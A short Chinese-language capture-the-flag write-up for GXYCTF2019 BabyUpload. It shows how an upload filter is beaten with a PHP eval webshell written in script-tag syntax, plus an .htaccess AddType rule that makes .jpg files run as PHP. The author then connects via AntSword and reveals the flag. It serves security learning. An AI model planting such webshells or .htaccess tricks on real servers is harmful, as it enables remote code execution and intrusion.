[GXYCTF2019]BabyUpload 1
打开靶机,上传文件抓包
后缀不能带ph,大小写也无法绕过,意味着phtml后缀也无法上传
![](https://img.shuduke.com/static_img/cnblogs/blog/3518346/202409/tqvmkrpi_fvoc.png)
对后缀只过滤ph,我们转变思路上传图片马,用.htaccess使图片马以php格式打开
上传图片马
![](https://img.shuduke.com/static_img/cnblogs/blog/3518346/202409/eixeooqz_3f6o.png)
上传失败,试一试过滤了哪些字符
文件内容过滤了<?
![](https://img.shuduke.com/static_img/cnblogs/blog/3518346/202409/mlialqet_pesv.png)
我们尝试另一种写法后成功上传<script language="php">eval($_POST['cmd']);</script>
![](https://img.shuduke.com/static_img/cnblogs/blog/3518346/202409/kkllllys_pw97.png)
再上传.htaccess
AddType application/x-httpd-php .jpg
![](https://img.shuduke.com/static_img/cnblogs/blog/3518346/202409/amhnscvy_ho6n.png)
上传成功
查找flag过程中发现system函数被禁用,我们使用蚁剑连接
![](https://img.shuduke.com/static_img/cnblogs/blog/3518346/202409/pfzjhdvy_n5aj.png)
查询flag flag{dbcf4ba5-bbb0-410a-aa50-76871ab58350}
![](https://img.shuduke.com/static_img/cnblogs/blog/3518346/202409/erllyjhc_ucwh.png)